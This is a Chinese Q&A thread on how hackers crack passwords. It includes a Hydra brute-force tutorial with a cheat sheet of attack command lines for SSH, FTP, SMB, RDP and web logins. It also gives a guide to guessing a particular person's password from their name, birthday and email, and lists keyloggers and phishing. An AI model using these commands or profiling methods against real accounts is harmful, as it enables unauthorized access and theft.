黑客破解密碼的原理是什麼？

我下載了一個WIFI密碼破解器，貌似它就是在從00000000試到999999999。密碼破解的真正原理是什麼呢？

---

有人介紹了這麼多原理，我就來介紹工具好啦！

黑客破解工具Hydra在線爆破密碼

這款暴力密碼破解工具相當強大，支持幾乎所有協議的在線密碼破解，其密碼能否被破解關鍵在於字典是否足夠強大。對於社會工程型滲透來說，有時能夠得到事半功倍的效果。

hydra是著名黑客組織thc的一款開源的暴力密碼破解工具，可以在線破解多種密碼

hydra 是一款強大的，在線密碼破解工具。它支持Linux和Windows密碼的破解，同時也支持許多服務的登錄密碼破解。除此之外，它還可以進行，基於表單登陸的密碼破解。下面，讓我們看看如何使用該工具。

官網個版本下載（部分地區打不開的自己翻牆）

Home：https://www.thc.org/thc-hydra/

Windows：https://github.com/maaaaz/thc-hydra-windows

Linux：https://github.com/vanhauser-thc/thc-hydra

更多版本工具獲取 黑協十五周年紀念優盤裡頭有。https://shop260083730.taobao.com

首先，我們來看看hydra的幫助文檔。終端輸入命令:

hydra -h

我們可以看到他支持的破解服務非常多。例如:rdp，ftp，Cisco等。

現在，我以我物理機win10進行破解演示。我先win10上設置一個用戶名為 admin 登錄密碼也為 admin 的用戶。

現在回到Kali上。我用 nmap 對這台伺服器上開放的埠進行掃描。輸入命令:

nmap -p 1-1000 192.168.1.100

通過 nmap 的掃描，我們可以看到開放了很多危險埠。

現在，讓我們嘗試進行 smb 服務的破解。輸入命令:

hydra -l admin -P pass.txt smb://192.168.1.100

-l: 用戶名。

-P: 密碼字典。

-t: 代表線程數。過大的線程，極易導致hydra的奔潰。

-vV: 顯示詳細過程

可以看到很快我們就獲得了密碼：admin admin 。

我們可以看到密碼為 12345678 。

hydra不僅支持命令操作，它還支持圖形化界面。輸入命令: xhydra 就可以打開它的圖形界面了。操作和命令是一樣的。

最後為大家介紹下表單的破解。我們以 DVWA為例。DVWA是以 post 方式進行提交的。我們輸入以下命令:hydra -l admin -P pass.txt 192.168.30.128 http-post-form「/dvwa/login.php:username=^USER^password=^PASS^Login=login:S=index.php」 -t 1 -vV

http-post-form : 表單提交方式。

「/dvwa/login.php:username=^USER^password=^PASS^Login=login:S=index.php」 這一串代表的是post 提交時的數據。

S 表示成功登錄時的特徵。很快密碼也被破解了出來。

密碼: password 。

可以看出，用hydra破解表單密碼是非常複雜的。因此，建議破此類密碼可以用其它工具。

1、破解ssh：

hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip ssh
hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh

2、破解ftp：

hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認16) -vV
hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV

3、get方式提交，破解web登錄：

hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.php

4、post方式提交，破解web登錄：

hydra -l 用戶名 -P 密碼字典 -s 80 ip

http-post-form "/admin/login.php:username=^USER^password=^PASS^submit=login:sorry password"

（參數說明：-t同時線程數3，-l用戶名是admin，字典pass.txt，保存為out.txt，-f 當破解了一個密碼就停止， 10.36.16.18目標ip，http-post-form表示破解是採用http的post方式提交的表單密碼破解,&中的內容是表示錯誤猜解的返回信息提示。）

5、破解https：

hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

6、破解teamspeak：

hydra -l 用戶名 -P 密碼字典 -s 埠號 -vV ip teamspeak

7、破解cisco：

hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8、破解smb：

hydra -l administrator -P pass.txt 10.36.16.18 smb

9、破解pop3：

hydra -l muts -P pass.txt my.pop3.mail pop3

10、破解rdp：

hydra ip rdp -l administrator -P pass.txt -V

11、破解http-proxy：

hydra -l admin -P pass.txt http-proxy://10.36.16.18

12、破解imap：

hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

更多乾貨學習，關注「合天智匯」公眾號喲！

---

你問的太籠統

所謂的密碼破解，列舉幾種：

1.wifi密碼、word、rar這種，主要是窮舉，就是暴力破解，一共八位，已計算機這樣的性能，暴力破起來也不難

2.普通解密，有明確加密演算法並且可逆的加密密文，直接用演算法算出來

3.大數據破解，撞庫，比如md5加密的破解

4.利用演算法漏洞，比如某些軟體的加密，用漏洞(具體是啥漏洞就不能一概而論了）

最後~~不要小看暴力破解窮舉法，理論上這種方法是萬能且一定可以破解出密文的

---

密碼心理學就是從用戶的心理入手，分析對方心理，從而更快的破解出密碼。掌握好可以快速破解、縮短破解時間，獲得用戶信息，這裡說的破解都只是在指黑客破解密碼，而不是軟體的註冊破解。

分析一下，主要考慮下面的心理原則：

一、對中國人來說，一般都沒有英文名的習慣，好像我就沒有英文名，所以中文拼音很多人用來做密碼，一般人去論壇什麼對方註冊一個用戶名，由於一般簡稱很容易給人家搶了，所以一般也就是用全稱。好像我的cyh是簡稱一般給人家註冊了，caiyihao就很少人用。這裡說的是名，如果是密碼，一般要倒過來考慮，一般是先從簡稱再全稱，理由很簡單：短，輸入時間快。

二、數字也是用得很多的，我想用得最多的密碼是：123，123456(因為一般我們的習慣是六位數字，包括銀行的存摺都是六位，論壇一般最低要求六位，注意這點)，試一下QQ的密碼，其實不少人是這樣的。特別是新手。一般人密碼是三位或者是六位。下面一些也是常用的：1，11，111，123，168，1314，520(特殊意義的數字)，……

三、生日用得特別多，有人把存摺和身份證放一起丟了，給盜賊用他的生日拿到了錢。這個是由於人們怕忘記，而自己的生日是不會忘記的，所以就用了的原因。由於上面說到的六位，所以剛剛好可以這樣790102，在用戶看來剛好省事，不知道：最方便就是最危險。一般人用是這樣的習慣：六位就是790102，四位是7912。如果那個月和日是只有一位的，也就是1～9，一般人就是用四位的，如：7632，而不是760302，如果日期是雙位的，10～31，一般人也就是用到六位而不會是五位，如：760321而不是76321。如果月是雙位，一般日就是雙位的，如：761203，而一般不是76123。說得夠羅索了吧，呵呵，總體來說也就是月和日都是同樣位數的。因為這樣比較美觀。也有人不用日，只用到月，如：763，而對中國人來說7603用得少，因為看起來0是多餘的。

四、我想：一個做暴力破解機軟體的人，只要他思考過，而且技術上能達到的話，一般破解應該按照這個順序來：數字→字母→特殊符號。對方用戶名一般不用大寫字，都是小寫的多。例如我就是用cyh比CYH多，而且用caiyihao而從來不用CAIYIHAO。密碼就要考慮大小寫。理論上也應該按照先小寫再大寫來。因為用戶輸入大寫字一般人不是按shift鍵而是按caps lock鍵，所以理論上來說一般是要大寫所有字母幾個都大寫。

五、做一個黑客就是要從細微入手分析用戶的信息。電子郵箱入手的話可以知道一些什麼呢？例如：

caiyihao@163.com可以知道一些什麼呢?可以看出來是對方是用拼音的用戶名，所以對方應該姓蔡。

cyh790101@163.com還可以知道一些什麼呢?對方生日：790101。當然也可以從主頁看出來，例如：www.****.com，很明顯的。還可以由一個人昵稱推知名或者姓，例如我的QQ昵稱「浩」，很明顯我的名有「浩」字，獲得信息還有很多途徑的，用得多是搜索引擎，建議最少用兩個，搜可以用他的名搜，也可以用他的郵箱搜，也可以用他的文章搜等等。平時應該多一些常識，例如對方QQ上寫了「廣東dg」，結合地理就應該知道是「廣東東莞」。至於由對方聊天內容看出對方男女性別、大概多大、是否還讀書、是否獨生子女、在家裡兄弟姐妹中排老大還是最小，這些就不是本文所要涉及的。

總之：細心觀察; 設身處地，從對方入手; 動腦筋，「書是死的，人是活的」。用方法，可以不用工具就可以破解掉一些密碼了。一般人的密碼不會超過3個的，即使他有過很多個，最後也會縮小到2、3個的。而且一般人的所有郵箱密碼都基本一樣的，論壇註冊的密碼也都一樣的，所以破解了一個也就可以得到很多個地方的密碼了。駭客說 - 駭客技術學習

---

我知道的形式有幾種:

1 暴力。。。（不是膜！）破解

2 社工庫、撞庫

3 根據你已經泄露的其他信息猜（姓名、生日、手機號等），比如某某某的手機號是10086，那麼他的密碼可能是xxx10086或者是xxx19980101這樣的

4 木馬盜取（遊戲外掛可能會盯著你的按鍵輸入，特別是靠按鍵來激活功能的外掛，一般都會創建一個新的輸入法，說是方便按鍵開啟外掛功能，實際上是會偷窺鍵盤輸入的）

5 假官網盜取（4和5都是讓你心甘情願輸入密碼的，5是假手機、遊戲、購物網站）

---

推薦閱讀：